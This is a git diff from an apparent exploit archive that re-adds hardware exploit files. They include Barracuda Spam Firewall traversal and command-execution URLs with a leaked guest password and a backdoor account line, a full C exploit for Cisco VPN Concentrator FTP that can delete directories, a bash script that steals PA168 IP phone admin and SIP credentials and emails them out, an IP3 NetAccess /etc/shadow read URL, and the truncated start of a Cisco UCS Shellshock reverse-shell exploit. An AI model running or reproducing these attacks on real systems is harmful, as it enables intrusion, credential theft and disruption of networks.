that it is +possible to download the full configuration file for the barracuda. The +configuration file is periodically backed-up into the /tmp directory as +"/tmp/backup/periodic_config.txt.tmp" Message confidentiality is compromised by the +fact that an attacker who is able to view the message log screen (which can be done +via the guest password vulnerability) can easily view any message on the system. +The message logs are stored as /mail/mlog/X/Y/email_address/msgID where X is the +first character of email_address, Y is the second character of email_address, +email_address is the recipient's email address and msgID is the message ID assigned +to the message in question. So for example if jon@smith.com received a message with +messageID 1234, any user could view the message by entering +/mail/mlog/j/o/jon@smith.com/1234 + +Proof of Concept: + +https:///cgi-bin/preview_email.cgi?file=/mail/mlog/../tmp/backup/periodic_config.txt.tmp + +Command Execution by Matthew Hall + +https:///cgi-bin/preview_email.cgi?file=/mail/mlog/../../bin/ls%20/| + +Recommendations: +* Never allow your barracuda web interface to be accessible from untrusted networks (especially the Internet) +* Upgrade to version 3.3.0.54 or later + +Vendor Contact: +30 May 2006 - Initial Vendor Contact +24 June 2006 - Vendor replies with prospect of fix +17 July 2006 - NNL request status update, no reply +01 Aug 2006 - NNL releases vuln report, notifies vendor of release + +# milw0rm.com [2006-08-07] diff --git a/platforms/hardware/remote/2145.txt b/platforms/hardware/remote/2145.txt index 88996c44f..ac06d02ae 100755 --- a/platforms/hardware/remote/2145.txt +++ b/platforms/hardware/remote/2145.txt @@ -1,57 +1,57 @@ -Title: Barracuda Arbitrary File Disclosure + Command Execution -Severity: High (Sensitive Information Disclosure) -Date: 01 August 2006 -Version Affected: Barracuda Spam Firewall version 3.3.01.001 to 3.3.03.053 -Discovered by: Greg Sinclair -Credits: Matthew Hall -Update: 07 August 2006 -Updated by: PATz - -#################################################################### - -Proof of Concept: -https:///cgi-bin/preview_email.cgi?file=/mail/mlog/../tmp/backup/periodic_config.txt.tmp -https:///cgi-bin/preview_email.cgi?file=/mail/mlog/../../bin/ls%20/| - - -#################################################################### - -#using |unix| for command execution: - -https:///cgi-bin/preview_email.cgi?file=/mail/mlog/|uname%20-a| - -#admin login/pass vuln - -https:///cgi-bin/preview_email.cgi?file=/mail/mlog|cat%20update_admin_passwd.pl| -https:///cgi-bin/preview_email.cgi?file=/mail/mlog/../bin/update_admin_passwd.pl - -eg. - -#`/home/emailswitch/code/firmware/current/bin/updateUser.pl guest phteam99 2>&1`; -login: guest pass: phteam99 - -some folder are accessible via http without permission -https:///Translators/ -https:///images/ -https:///locale -https:///plugins -https:///help - -#stuff in do_install - -/usr/sbin/useradd support -s /home/emailswitch/code/firmware/current/bin/request_support.pl -p swUpHFjf1MUiM - -## Create backup tmp dir - -/bin/mkdir -p /mail/tmp/backup/ -chmod -R 777 /mail/tmp/ - -## Create smb backup mount point -/bin/mkdir -p /mnt/smb/ -chmod 777 /mnt/smb/ - -................................. -Greetz to all noypi and phteam ^^, -.............eof................. - -# milw0rm.com [2006-08-08] +Title: Barracuda Arbitrary File Disclosure + Command Execution +Severity: High (Sensitive Information Disclosure) +Date: 01 August 2006 +Version Affected: Barracuda Spam Firewall version 3.3.01.001 to 3.3.03.053 +Discovered by: Greg Sinclair +Credits: Matthew Hall +Update: 07 August 2006 +Updated by: PATz + +#################################################################### + +Proof of Concept: +https:///cgi-bin/preview_email.cgi?file=/mail/mlog/../tmp/backup/periodic_config.txt.tmp +https:///cgi-bin/preview_email.cgi?file=/mail/mlog/../../bin/ls%20/| + + +#################################################################### + +#using |unix| for command execution: + +https:///cgi-bin/preview_email.cgi?file=/mail/mlog/|uname%20-a| + +#admin login/pass vuln + +https:///cgi-bin/preview_email.cgi?file=/mail/mlog|cat%20update_admin_passwd.pl| +https:///cgi-bin/preview_email.cgi?file=/mail/mlog/../bin/update_admin_passwd.pl + +eg. + +#`/home/emailswitch/code/firmware/current/bin/updateUser.pl guest phteam99 2>&1`; +login: guest pass: phteam99 + +some folder are accessible via http without permission +https:///Translators/ +https:///images/ +https:///locale +https:///plugins +https:///help + +#stuff in do_install + +/usr/sbin/useradd support -s /home/emailswitch/code/firmware/current/bin/request_support.pl -p swUpHFjf1MUiM + +## Create backup tmp dir + +/bin/mkdir -p /mail/tmp/backup/ +chmod -R 777 /mail/tmp/ + +## Create smb backup mount point +/bin/mkdir -p /mnt/smb/ +chmod 777 /mnt/smb/ + +................................. +Greetz to all noypi and phteam ^^, +.............eof................. + +# milw0rm.com [2006-08-08] diff --git a/platforms/hardware/remote/254.c b/platforms/hardware/remote/254.c index f09e68108..fa75aafad 100755 --- a/platforms/hardware/remote/254.c +++ b/platforms/hardware/remote/254.c @@ -257,6 +257,6 @@ int main(int argc, char *argv[]) { brute(); } } - - -// milw0rm.com [2001-01-19] + + +// milw0rm.com [2001-01-19] diff --git a/platforms/hardware/remote/2638.c b/platforms/hardware/remote/2638.c index 237dce22f..0cdd14576 100755 --- a/platforms/hardware/remote/2638.c +++ b/platforms/hardware/remote/2638.c @@ -1,233 +1,233 @@ -/* Cisco VPN Concentrator 3000 FTP remote exploit - * ============================================== - * A vulnerability exists in the Cisco VPN Concentrator 3000, - * an unauthenticated user may access the file system through - * manipulation of FTP service commands. An unauthenticated - * user can use the following commands; - * - * CWD - Change the current working directory - * MKD - Make a directory within the current working directory - * CDUP - Change directory up one tree. - * RNFR - Rename From (This can be used to identify files and directories) - * SIZE - This can be used to identify files and directories - * RMD - This can be used to delete a directory - * - * The FTP service remembers the current working directory so directory - * changes can affect exploitation. By removing potentially sensitive - * directories such as "CERTS" it may be possible to disrupt service - * to a VPN. - * - * Confirmed Vulnerable - * + Cisco Systems Inc./VPN 3000 concentrator Version 4.1.5 RelJun 18 2004 - * - * Example. - * localhost exploits # ./prdelka-vs-CISCO-vpnftp -s 10.1.2.10 -c / - * [ Cisco VPN Concentrator 3000 FTP service exploit - * [ Connected to 10.1.2.10 (21/tcp) - * [ Changing directory to / - * [ Success! changed directory to / - * localhost exploits # ./prdelka-vs-CISCO-vpnftp -s 10.1.2.10 -t config - * [ Cisco VPN Concentrator 3000 FTP service exploit - * [ Connected to 10.1.2.10 (21/tcp) - * [ Testing for the existance of config - * [ Success! file config does exist! - * - * - * - prdelka - */ -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - -int main (int argc, char *argv[]){ - int ihost=0,index=0,imkdir=0,ichdir=0,idelete=0,itest=0,ipass=0,port=21; - int c, sd, rc, size; - char *host, *directory, *file, *buffer, *rbuffer; - struct sockaddr_in servAddr; - struct hostent *h; - static struct option options[]={ - {"server", 1, 0, 's'}, - {"port", 1, 0, 'p'}, - {"rmdir", 1, 0, 'r'}, - {"mkdir", 1, 0, 'm'}, - {"chdir", 1, 0, 'c'}, - {"test", 1, 0, 't'}, - {"help", 0, 0,'h'} - }; - printf("[ Cisco VPN Concentrator 3000 FTP service exploit\n"); - while(c != -1){ - c = getopt_long(argc,argv,"s:p:r:m:c:t:h",options,&index); - switch(c){ - case 's': - if(ihost==0){ - h = gethostbyname(optarg); - if(h==NULL){ - printf("[ Error unknown host '%s'\n",optarg); - exit(1); - } - host = malloc(strlen(optarg) + 1); - sprintf(host,"%s",optarg); - ihost = 1; - } - break; - case 'p': - port = atoi(optarg); - break; - case 'r': - if(idelete==0){ - if(ipass!=1){ - ipass = 1; - idelete = 1; - directory = optarg; - } - else{ - printf("[ Error: cannot delete directory as another option already selected\n"); - exit(1); - } - } - break; - case 'c': - if(ichdir==0){ - if(ipass!=1){ - ipass = 1; - ichdir = 1; - directory = optarg; - } - else{ - printf("[ Error: cannot change dir as another option already selected\n"); - exit(2); - } - } - break; - case 't': - if(itest==0){ - if(ipass!=1){ - ipass = 1; - itest = 1; - file = optarg; - } - else{ - printf("[ Error: cannot test for existance as another option already selected\n"); - exit(3); - } - } - break; - case 'm': - if(imkdir==0){ - if(ipass!=1){ - ipass = 1; - imkdir = 1; - directory = optarg; - } - else{ - printf("[ Error: cannot make directory as another option already selected\n"); - exit(4); - } - - } - break; - case 'h': - printf("[ Usage instructions.\n[\n"); - printf("[ %s (optional)\n[\n",argv[0]); - printf("[\t--server|-s \n[\t--port|-p (port) [default 21]\n[\t--rmdir|-r (directory)\n[\t--mkdir|-m (directory)\n"); - printf("[\t--chdir|-c (directory)\n[\t--test|-t (filename/directory)\n[\n"); - exit(0); - break; - default: - break; - } - } - if(ihost != 1 || ipass != 1){ - printf("[ Error insufficient arguements, try running '%s --help'\n",argv[0]); - exit(1); - } - servAddr.sin_family = h->h_addrtype; - memcpy((char *) &servAddr.sin_addr.s_addr, h->h_addr_list[0], h->h_length); - servAddr.sin_port = htons(port); - sd = socket(AF_INET, SOCK_STREAM, 0); - if(sd<0){ - printf("[ Cannot open socket\n"); - exit(1); - } - rc = connect(sd, (struct sockaddr *) &servAddr, sizeof(servAddr)); - if(rc<0){ - printf("[ Cannot connect\n"); - exit(1); - } - printf("[ Connected to %s (%d/tcp)\n",host,port); - rbuffer = malloc(1024); - if(ichdir==1){ - printf("[ Changing directory to %s\n",directory); - size = 2048 + strlen(directory); - buffer = malloc(size); - sprintf(buffer,"CWD %s\r\n",directory); - rc = send(sd, buffer, strlen(buffer),0); - while((rc = recv(sd, rbuffer,1023,0)) != -1){ - rbuffer[rc]=0; - if(strstr(rbuffer,"250 Changed to .") != NULL){ - printf("[ Success! changed directory to %s\n",directory); - break; - } - if(strstr(rbuffer,"530 Can't change directory to") != NULL){ - printf("[ Error! cannot set current directory to %s\n",directory); - exit(-1); - } - } - } - if(imkdir==1){ - printf("[ Making directory %s\n",directory); - size = 2048 + strlen(directory); - buffer = malloc(size); - sprintf(buffer,"MKD %s\r\n",directory); - rc = send(sd, buffer, strlen(buffer),0); - while((rc = recv(sd, rbuffer,1023,0)) != -1){ - rbuffer[rc]=0; - if(strstr(rbuffer,"257 MKD command successful.") != NULL){ - printf("[ Success! directory %s created\n",directory); - break; - } - } - } - if(idelete==1){ - printf("[ Deleting directory %s\n",directory); - size = 2048 + strlen(directory); - buffer = malloc(size); - sprintf(buffer,"RMD %s\r\n",directory); - rc = send(sd, buffer, strlen(buffer),0); - while((rc = recv(sd, rbuffer,1023,0)) != -1){ - rbuffer[rc]=0; - if(strstr(rbuffer,"250 RMD command successful.") != NULL){ - printf("[ Success! directory %s deleted\n",directory); - break; - } - } - } - if(itest==1){ - printf("[ Testing for the existance of %s\n",file); - size = 2048 + strlen(file); - buffer = malloc(size); - sprintf(buffer,"RNFR %s\r\n",file); - rc = send(sd, buffer,strlen(buffer),0); - while((rc = recv(sd, rbuffer,1023,0)) != -1){ - rbuffer[rc]=0; - if(strstr(rbuffer,"350 RNFR accepted - file exists, ready for destination.") != NULL){ - printf("[ Success! %s does exist!\n",file); - break; - } - if(strstr(rbuffer,"550 File does not exist!") != NULL){ - printf("[ Success! %s does not exist\n",file); - break; - } - } - } - exit(0); -} - -// milw0rm.com [2006-10-24] +/* Cisco VPN Concentrator 3000 FTP remote exploit + * ============================================== + * A vulnerability exists in the Cisco VPN Concentrator 3000, + * an unauthenticated user may access the file system through + * manipulation of FTP service commands. An unauthenticated + * user can use the following commands; + * + * CWD - Change the current working directory + * MKD - Make a directory within the current working directory + * CDUP - Change directory up one tree. + * RNFR - Rename From (This can be used to identify files and directories) + * SIZE - This can be used to identify files and directories + * RMD - This can be used to delete a directory + * + * The FTP service remembers the current working directory so directory + * changes can affect exploitation. By removing potentially sensitive + * directories such as "CERTS" it may be possible to disrupt service + * to a VPN. + * + * Confirmed Vulnerable + * + Cisco Systems Inc./VPN 3000 concentrator Version 4.1.5 RelJun 18 2004 + * + * Example. + * localhost exploits # ./prdelka-vs-CISCO-vpnftp -s 10.1.2.10 -c / + * [ Cisco VPN Concentrator 3000 FTP service exploit + * [ Connected to 10.1.2.10 (21/tcp) + * [ Changing directory to / + * [ Success! changed directory to / + * localhost exploits # ./prdelka-vs-CISCO-vpnftp -s 10.1.2.10 -t config + * [ Cisco VPN Concentrator 3000 FTP service exploit + * [ Connected to 10.1.2.10 (21/tcp) + * [ Testing for the existance of config + * [ Success! file config does exist! + * + * + * - prdelka + */ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +int main (int argc, char *argv[]){ + int ihost=0,index=0,imkdir=0,ichdir=0,idelete=0,itest=0,ipass=0,port=21; + int c, sd, rc, size; + char *host, *directory, *file, *buffer, *rbuffer; + struct sockaddr_in servAddr; + struct hostent *h; + static struct option options[]={ + {"server", 1, 0, 's'}, + {"port", 1, 0, 'p'}, + {"rmdir", 1, 0, 'r'}, + {"mkdir", 1, 0, 'm'}, + {"chdir", 1, 0, 'c'}, + {"test", 1, 0, 't'}, + {"help", 0, 0,'h'} + }; + printf("[ Cisco VPN Concentrator 3000 FTP service exploit\n"); + while(c != -1){ + c = getopt_long(argc,argv,"s:p:r:m:c:t:h",options,&index); + switch(c){ + case 's': + if(ihost==0){ + h = gethostbyname(optarg); + if(h==NULL){ + printf("[ Error unknown host '%s'\n",optarg); + exit(1); + } + host = malloc(strlen(optarg) + 1); + sprintf(host,"%s",optarg); + ihost = 1; + } + break; + case 'p': + port = atoi(optarg); + break; + case 'r': + if(idelete==0){ + if(ipass!=1){ + ipass = 1; + idelete = 1; + directory = optarg; + } + else{ + printf("[ Error: cannot delete directory as another option already selected\n"); + exit(1); + } + } + break; + case 'c': + if(ichdir==0){ + if(ipass!=1){ + ipass = 1; + ichdir = 1; + directory = optarg; + } + else{ + printf("[ Error: cannot change dir as another option already selected\n"); + exit(2); + } + } + break; + case 't': + if(itest==0){ + if(ipass!=1){ + ipass = 1; + itest = 1; + file = optarg; + } + else{ + printf("[ Error: cannot test for existance as another option already selected\n"); + exit(3); + } + } + break; + case 'm': + if(imkdir==0){ + if(ipass!=1){ + ipass = 1; + imkdir = 1; + directory = optarg; + } + else{ + printf("[ Error: cannot make directory as another option already selected\n"); + exit(4); + } + + } + break; + case 'h': + printf("[ Usage instructions.\n[\n"); + printf("[ %s (optional)\n[\n",argv[0]); + printf("[\t--server|-s \n[\t--port|-p (port) [default 21]\n[\t--rmdir|-r (directory)\n[\t--mkdir|-m (directory)\n"); + printf("[\t--chdir|-c (directory)\n[\t--test|-t (filename/directory)\n[\n"); + exit(0); + break; + default: + break; + } + } + if(ihost != 1 || ipass != 1){ + printf("[ Error insufficient arguements, try running '%s --help'\n",argv[0]); + exit(1); + } + servAddr.sin_family = h->h_addrtype; + memcpy((char *) &servAddr.sin_addr.s_addr, h->h_addr_list[0], h->h_length); + servAddr.sin_port = htons(port); + sd = socket(AF_INET, SOCK_STREAM, 0); + if(sd<0){ + printf("[ Cannot open socket\n"); + exit(1); + } + rc = connect(sd, (struct sockaddr *) &servAddr, sizeof(servAddr)); + if(rc<0){ + printf("[ Cannot connect\n"); + exit(1); + } + printf("[ Connected to %s (%d/tcp)\n",host,port); + rbuffer = malloc(1024); + if(ichdir==1){ + printf("[ Changing directory to %s\n",directory); + size = 2048 + strlen(directory); + buffer = malloc(size); + sprintf(buffer,"CWD %s\r\n",directory); + rc = send(sd, buffer, strlen(buffer),0); + while((rc = recv(sd, rbuffer,1023,0)) != -1){ + rbuffer[rc]=0; + if(strstr(rbuffer,"250 Changed to .") != NULL){ + printf("[ Success! changed directory to %s\n",directory); + break; + } + if(strstr(rbuffer,"530 Can't change directory to") != NULL){ + printf("[ Error! cannot set current directory to %s\n",directory); + exit(-1); + } + } + } + if(imkdir==1){ + printf("[ Making directory %s\n",directory); + size = 2048 + strlen(directory); + buffer = malloc(size); + sprintf(buffer,"MKD %s\r\n",directory); + rc = send(sd, buffer, strlen(buffer),0); + while((rc = recv(sd, rbuffer,1023,0)) != -1){ + rbuffer[rc]=0; + if(strstr(rbuffer,"257 MKD command successful.") != NULL){ + printf("[ Success! directory %s created\n",directory); + break; + } + } + } + if(idelete==1){ + printf("[ Deleting directory %s\n",directory); + size = 2048 + strlen(directory); + buffer = malloc(size); + sprintf(buffer,"RMD %s\r\n",directory); + rc = send(sd, buffer, strlen(buffer),0); + while((rc = recv(sd, rbuffer,1023,0)) != -1){ + rbuffer[rc]=0; + if(strstr(rbuffer,"250 RMD command successful.") != NULL){ + printf("[ Success! directory %s deleted\n",directory); + break; + } + } + } + if(itest==1){ + printf("[ Testing for the existance of %s\n",file); + size = 2048 + strlen(file); + buffer = malloc(size); + sprintf(buffer,"RNFR %s\r\n",file); + rc = send(sd, buffer,strlen(buffer),0); + while((rc = recv(sd, rbuffer,1023,0)) != -1){ + rbuffer[rc]=0; + if(strstr(rbuffer,"350 RNFR accepted - file exists, ready for destination.") != NULL){ + printf("[ Success! %s does exist!\n",file); + break; + } + if(strstr(rbuffer,"550 File does not exist!") != NULL){ + printf("[ Success! %s does not exist\n",file); + break; + } + } + } + exit(0); +} + +// milw0rm.com [2006-10-24] diff --git a/platforms/hardware/remote/294.pl b/platforms/hardware/remote/294.pl index 7c9134cda..f6d645a11 100755 --- a/platforms/hardware/remote/294.pl +++ b/platforms/hardware/remote/294.pl @@ -167,6 +167,6 @@ $rs.=$rline; } close $remote; -} - -# milw0rm.com [2004-04-28] +} + +# milw0rm.com [2004-04-28] diff --git a/platforms/hardware/remote/3189.sh b/platforms/hardware/remote/3189.sh index 113f159fd..c27874a77 100755 --- a/platforms/hardware/remote/3189.sh +++ b/platforms/hardware/remote/3189.sh @@ -1,142 +1,142 @@ -#!/bin/bash -# PR06-14: IP Phones based on Centrality Communications/Aredfox PA168 chipset weak session management vulnerability - -# Author: Adrian Pastor [adrian.pastor-AT-procheckup.com] from ProCheckUp - -# This advisory has been published following consultation with UK NISCC [http://www.niscc.gov.uk/] -# Date Found: 3rd November 2006 -# Date Public: 22nd January 2007 -# Vulnerable: -# Phones confirmed to be vulnerable: -# - ATCOM AT-320ED IP Phone running SIP firmware version V1.42 and 1.54 -# - SOYO G668 Ethernet IP Phone running SIP firmware version v1.42 -# The following vendors/models also use the same PA168 chipset/firmware -# and are therefore most likely to be vulnerable to the same issue: -# - AriaVoice -# - AT-323 from ATcom -# - JR168_100B from IPLink -# - JR168_100W from IPLink -# - JR168_200 from IPLink -# - Netweb-401/402 from NetWebGroup -# - OB-WAN VoIP: Ethernet#1 and Ethernet#2 phones are PA168-based -# - Vida some phones PA168 based -# - Wuchuan HOP-1001/1002/1003 -# - Giptel IP phones G100, also Siptronic ST-100 and Siptronic ST-150 (PA168S chipset) -# - GNET some phones PA168x based -# - KE1020 Netphone (Meritline) -# - ML210 Meritline -# - Integrated Networks IN-1002. Found on eBay. -# - ArtDio IPF-2000 and IPF-2002L phones -# - Perfectone IP300 - -# Severity: Medium - -# CVE Candidate: Not assigned - -# Overview: -# There is a problem with the way IP Phones using the PA168 chipset handle -# authenticated sessions, allowing remote attackers to gain access to the -# admin web console running as superuser. - -# Description: -# When the superuser account authenticates to the admin web console, a -# request such as the following is sent to the IP phone's web server: - -# POST /a HTTP/1.1 -# Referer: http://192.168.1.100/ -# Host: 192.168.1.100 -# Content-Length: 31 - -# auth=12345678&login=+++Login+++ - -# At this point, the superuser session is considered *active* by the web -# server. All it takes for attackers to perform an administrative task at -# this point, is for them to send a well-formed request to the web server. -# Since no authentication tokens or password are submitted within the HTTP -# requests, anyone can perform administrative tasks while the session is -# active. Even if the attacker sends the administrative requests from an -# IP address different to the one used by the superuser account, the IP -# Phone's web server would accept them as long as the superuser's session -# is still active. - -# A script called "active-session-attack.sh" has been created, which -# remotely checks repeatedly until a superuser account has logged on by -# sending a forged superuser request every five seconds. As soon as the -# superuser session becomes active, the following information will be -# obtained from the settings page, and emailed to the attacker: - -# - IP phone's superuser password - grants administrative access -# - IP phone's user password - grants restricted access -# - SIP gateway hostname/IP address -# - SIP account username -# - SIP account PIN number - -# REQUEST: - -# POST /g HTTP/1.1 -# Host: 192.168.1.100 -# Content-Length: 13 - -# back=++Back++ - -# RESPONSE (output has been partially omitted for clarification): - -# HTTP/1.1 200 OK -# Content-Length: 16727 -# Content-Type: text/html -# Connection: close - -# IP Phone V1.54 -# [output omitted] -# -# -# -# -# -# -# [output omitted] - -# In order to test this vulnerability, the following steps have been provided: - -# 1. Log into http://192.168.1.100 from computer A using the superuser -# password ('12345678' by default) -# 2. Send the following curl command from computer B: -# curl -d "back=++Back++" http://192.168.1.100/g -# 3. The administrative settings page should be returned without any -# password required. -# Note: the IP phone's web server is enabled by default -# Fix: - -# Use access control lists on routers or firewalls in order to only allow -# trusted IP addresses to access ATCOM AT-320ED IP Phone's web server. -# Exposing the PA168-based IP Phone's admin web server on the Internet is -# not recommended. - -# References: -# http://www.voip-info.org/wiki/view/PA168 -# http://www.centralitycomm.com/ -# http://www.aredfox.com/eindex.htm -# http://www.atcom.cn/En_products_At320ED.html -# http://www.soyogroup.com/products/proddesc.php?id=307 -# http://www.procheckup.com/Vulner_2007.php - -host="192.168.1.100"; -attackers_email="adrian.pastor-AT-procheckup.com" -req="POST /g HTTP/1.0\r\nContent-length: 13\r\n\r\nback=++Back++\r\n\r\n"; - -while true -do - res=`echo -en $req | nc -nv $host 80`; - if echo $res | grep superpassword # if this gets returned, then we got the settings page with all SIP account and IP phone creds - then - echo "GOT IT!" - echo $res > "admin-settings-page" - echo $res | mail $attackers_email -s "PA168 IP Phone admin's settings page" - exit 1 - else - echo "bad luck" - fi - sleep 5 -done - -# milw0rm.com [2007-01-24] +#!/bin/bash +# PR06-14: IP Phones based on Centrality Communications/Aredfox PA168 chipset weak session management vulnerability + +# Author: Adrian Pastor [adrian.pastor-AT-procheckup.com] from ProCheckUp + +# This advisory has been published following consultation with UK NISCC [http://www.niscc.gov.uk/] +# Date Found: 3rd November 2006 +# Date Public: 22nd January 2007 +# Vulnerable: +# Phones confirmed to be vulnerable: +# - ATCOM AT-320ED IP Phone running SIP firmware version V1.42 and 1.54 +# - SOYO G668 Ethernet IP Phone running SIP firmware version v1.42 +# The following vendors/models also use the same PA168 chipset/firmware +# and are therefore most likely to be vulnerable to the same issue: +# - AriaVoice +# - AT-323 from ATcom +# - JR168_100B from IPLink +# - JR168_100W from IPLink +# - JR168_200 from IPLink +# - Netweb-401/402 from NetWebGroup +# - OB-WAN VoIP: Ethernet#1 and Ethernet#2 phones are PA168-based +# - Vida some phones PA168 based +# - Wuchuan HOP-1001/1002/1003 +# - Giptel IP phones G100, also Siptronic ST-100 and Siptronic ST-150 (PA168S chipset) +# - GNET some phones PA168x based +# - KE1020 Netphone (Meritline) +# - ML210 Meritline +# - Integrated Networks IN-1002. Found on eBay. +# - ArtDio IPF-2000 and IPF-2002L phones +# - Perfectone IP300 + +# Severity: Medium + +# CVE Candidate: Not assigned + +# Overview: +# There is a problem with the way IP Phones using the PA168 chipset handle +# authenticated sessions, allowing remote attackers to gain access to the +# admin web console running as superuser. + +# Description: +# When the superuser account authenticates to the admin web console, a +# request such as the following is sent to the IP phone's web server: + +# POST /a HTTP/1.1 +# Referer: http://192.168.1.100/ +# Host: 192.168.1.100 +# Content-Length: 31 + +# auth=12345678&login=+++Login+++ + +# At this point, the superuser session is considered *active* by the web +# server. All it takes for attackers to perform an administrative task at +# this point, is for them to send a well-formed request to the web server. +# Since no authentication tokens or password are submitted within the HTTP +# requests, anyone can perform administrative tasks while the session is +# active. Even if the attacker sends the administrative requests from an +# IP address different to the one used by the superuser account, the IP +# Phone's web server would accept them as long as the superuser's session +# is still active. + +# A script called "active-session-attack.sh" has been created, which +# remotely checks repeatedly until a superuser account has logged on by +# sending a forged superuser request every five seconds. As soon as the +# superuser session becomes active, the following information will be +# obtained from the settings page, and emailed to the attacker: + +# - IP phone's superuser password - grants administrative access +# - IP phone's user password - grants restricted access +# - SIP gateway hostname/IP address +# - SIP account username +# - SIP account PIN number + +# REQUEST: + +# POST /g HTTP/1.1 +# Host: 192.168.1.100 +# Content-Length: 13 + +# back=++Back++ + +# RESPONSE (output has been partially omitted for clarification): + +# HTTP/1.1 200 OK +# Content-Length: 16727 +# Content-Type: text/html +# Connection: close + +# IP Phone V1.54 +# [output omitted] +# +# +# +# +# +# +# [output omitted] + +# In order to test this vulnerability, the following steps have been provided: + +# 1. Log into http://192.168.1.100 from computer A using the superuser +# password ('12345678' by default) +# 2. Send the following curl command from computer B: +# curl -d "back=++Back++" http://192.168.1.100/g +# 3. The administrative settings page should be returned without any +# password required. +# Note: the IP phone's web server is enabled by default +# Fix: + +# Use access control lists on routers or firewalls in order to only allow +# trusted IP addresses to access ATCOM AT-320ED IP Phone's web server. +# Exposing the PA168-based IP Phone's admin web server on the Internet is +# not recommended. + +# References: +# http://www.voip-info.org/wiki/view/PA168 +# http://www.centralitycomm.com/ +# http://www.aredfox.com/eindex.htm +# http://www.atcom.cn/En_products_At320ED.html +# http://www.soyogroup.com/products/proddesc.php?id=307 +# http://www.procheckup.com/Vulner_2007.php + +host="192.168.1.100"; +attackers_email="adrian.pastor-AT-procheckup.com" +req="POST /g HTTP/1.0\r\nContent-length: 13\r\n\r\nback=++Back++\r\n\r\n"; + +while true +do + res=`echo -en $req | nc -nv $host 80`; + if echo $res | grep superpassword # if this gets returned, then we got the settings page with all SIP account and IP phone creds + then + echo "GOT IT!" + echo $res > "admin-settings-page" + echo $res | mail $attackers_email -s "PA168 IP Phone admin's settings page" + exit 1 + else + echo "bad luck" + fi + sleep 5 +done + +# milw0rm.com [2007-01-24] diff --git a/platforms/hardware/remote/3294.txt b/platforms/hardware/remote/3294.txt index 5fd273fef..c9e7f0c8a 100755 --- a/platforms/hardware/remote/3294.txt +++ b/platforms/hardware/remote/3294.txt @@ -1,66 +1,66 @@ -I - TITLE - -Security advisory: Arbitrary file disclosure vulnerability in - IP3 NetAccess leads to full system compromise - -II - SUMMARY - -Description: Arbitrary file disclosure vulnerability in IP3 NetAccess - leads to full system compromise - -Author: Sebastian Wolfgarten (sebastian at wolfgarten dot com) - -Date: February 11th, 2007 - -Severity: High - -References: http://www.devtarget.org/ip3-advisory-02-2007.txt - -III - OVERVIEW - -IP3's NetAccess is a device created for high demand environments -such as convention centers or hotels. It handles the Internet access -and provides for instance firewalling, billing, rate-limiting as well -as various authentication mechanisms. The device is administrated via -SSH or a web-based GUI. Further information about the product can be -found online at http://www.ip3.com/poverview.htm. - -IV - DETAILS - -Due to inproper input validation, all NetAccess devices with a firmware version -less than 4.1.9.6 are vulnerable to an arbitrary file disclosure vulnerability. -This vulnerability allows an unauthenticated remote attacker to abuse the -web interface and read any file on the remote system. Due to the fact that important -system files are world-readable (see bid #17698), this does include /etc/shadow -and thus leads to a full compromise of the device! In addition an attacker is -able to gain access to the proprietary code base of the device and potentially -identify as well as exploit other (yet unknown) vulnerabilities. - -V - EXPLOIT CODE - -The trivial vulnerability can be exploited by accessing the file "getfile.cgi" -with a relative file path such as - -http://$target/portalgroups/portalgroups/getfile.cgi?filename=../../../../../../../../etc/shadow - -As the input to the "filename" parameter is not properly validated accessing -this URL will disclose the contents of /etc/shadow to a remote attacker. - -VI - WORKAROUND/FIX - -To address this problem, the vendor has released a new firmware version -(4.1.9.6) which is available at http://www.ip3.com. Hence all users of IP3's NetAccess -devices are asked to install this version immediately. - -As a temporary workaround, one may also limit the accessibility of the web interface -of the device to authorized personnel only. Nevertheless contacting the vendor and -installing the new firmware version is highly recommended! - -VII - DISCLOSURE TIMELINE - -31. December 2006 - Notified vendor -31. December 2006 - Vulnerability confirmed -17. January 2007 - Patch released -11. February 2007 - Public disclosure - -# milw0rm.com [2007-02-11] +I - TITLE + +Security advisory: Arbitrary file disclosure vulnerability in + IP3 NetAccess leads to full system compromise + +II - SUMMARY + +Description: Arbitrary file disclosure vulnerability in IP3 NetAccess + leads to full system compromise + +Author: Sebastian Wolfgarten (sebastian at wolfgarten dot com) + +Date: February 11th, 2007 + +Severity: High + +References: http://www.devtarget.org/ip3-advisory-02-2007.txt + +III - OVERVIEW + +IP3's NetAccess is a device created for high demand environments +such as convention centers or hotels. It handles the Internet access +and provides for instance firewalling, billing, rate-limiting as well +as various authentication mechanisms. The device is administrated via +SSH or a web-based GUI. Further information about the product can be +found online at http://www.ip3.com/poverview.htm. + +IV - DETAILS + +Due to inproper input validation, all NetAccess devices with a firmware version +less than 4.1.9.6 are vulnerable to an arbitrary file disclosure vulnerability. +This vulnerability allows an unauthenticated remote attacker to abuse the +web interface and read any file on the remote system. Due to the fact that important +system files are world-readable (see bid #17698), this does include /etc/shadow +and thus leads to a full compromise of the device! In addition an attacker is +able to gain access to the proprietary code base of the device and potentially +identify as well as exploit other (yet unknown) vulnerabilities. + +V - EXPLOIT CODE + +The trivial vulnerability can be exploited by accessing the file "getfile.cgi" +with a relative file path such as + +http://$target/portalgroups/portalgroups/getfile.cgi?filename=../../../../../../../../etc/shadow + +As the input to the "filename" parameter is not properly validated accessing +this URL will disclose the contents of /etc/shadow to a remote attacker. + +VI - WORKAROUND/FIX + +To address this problem, the vendor has released a new firmware version +(4.1.9.6) which is available at http://www.ip3.com. Hence all users of IP3's NetAccess +devices are asked to install this version immediately. + +As a temporary workaround, one may also limit the accessibility of the web interface +of the device to authorized personnel only. Nevertheless contacting the vendor and +installing the new firmware version is highly recommended! + +VII - DISCLOSURE TIMELINE + +31. December 2006 - Notified vendor +31. December 2006 - Vulnerability confirmed +17. January 2007 - Patch released +11. February 2007 - Public disclosure + +# milw0rm.com [2007-02-11] diff --git a/platforms/hardware/remote/39568.py b/platforms/hardware/remote/39568.py new file mode 100755 index 000000000..59975c2ff --- /dev/null +++ b/platforms/hardware/remote/39568.py @@ -0,0 +1,65 @@ +#!/usr/bin/python +############################################### +# Cisco UCS Manager 2.1(1b) Shellshock Exploit +# +# CVE-2014-6278 +# Confirmed on version 2.1(1b), but more are likely vulnerable. +# Cisco's advisory: +# https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash +# Exploit generates a reverse shell to a nc listener. +# Exploit Author: @thatchriseckert +############################################### + +import sys +import requests +import time + +if len(sys.argv) < 4: + print "\n[*] Cisco UCS Manager 2.1(1b) Shellshock Exploit" + print 